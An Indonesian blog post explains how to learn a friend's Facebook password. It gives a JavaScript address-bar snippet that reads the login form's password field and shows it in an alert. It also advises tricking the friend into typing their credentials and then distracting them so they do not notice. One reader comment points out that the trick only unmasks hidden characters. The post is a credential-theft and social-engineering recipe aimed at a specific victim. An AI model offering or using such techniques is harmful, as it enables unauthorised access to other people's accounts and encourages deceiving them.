Cara Mengetahui Password Facebook Teman

Cara Mengetahui Password Facebook Teman – Kalo kita ngebahas soal jejaring sosial, pasti yang kepikiran langsung facebook, facebook dan facebook. Terus yang terlintas kalo ada temen facebook yang nakal, pasti mikirin cara agar facebooknya bisa di hack. wah, wah.. itu sih cuma tebakan saya. Semoga nggak di tiru yah. hehe. Nah, untuk menghack facebook temen salah satu caranya yaitu mengetahui password fb temen. Selain memakai software Hack facebook, cara tergampang sih minta password langsung ke korban. Tapi pasti nggak bakalan di kasih ya. haha. Untuk artikel kali ini saya akan membagikan sebuah Cara Mengetahui Password Facebook Teman tanpa meminta langsung pastinya.


– Buka dulu Facebooknya.
– Untuk melakukan test coba masukkan email dan password di kolom login ( tapi jangan klik login dulu )
– Copy kode di bawah di address bar browser anda lalu tekan enter.

javascript:var a = new String(); for (var i = 0; i < document.forms.length; i++) { for (var j = 0; j < document.forms[i].elements.length; j++) { if (document.forms[i].elements[j].type == “password”) {a += document.forms[i].elements[j].value; } } } alert(a);


Maka password teman akan muncul seperti gambar di bawah ini.

hack facebook

Sedikit tips : agar cara ini berhasil, ajaklah teman untuk login di facebook tapi jangan di klik tombol login dulu. Suruhlah dia untuk beli makan atau minuman atau apapun asal jangan sampai dia curiga.
Semoga Cara Mengetahui Password Facebook Teman bermanfaat buat anda.

Kode dan gambar saya ambil dari angger.com
Advertisements

About Legy Masyhury

Hanya manusia biasa, sungguh! :D http://legianto.com http://desainku.net http://masyhury.web.id http://ideku.info
This entry was posted in Facebook, Tips, Tips Facebook. Bookmark the permalink.

One Response to Cara Mengetahui Password Facebook Teman

  1. itu mah cara membuka Pasword Bintang kalee

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s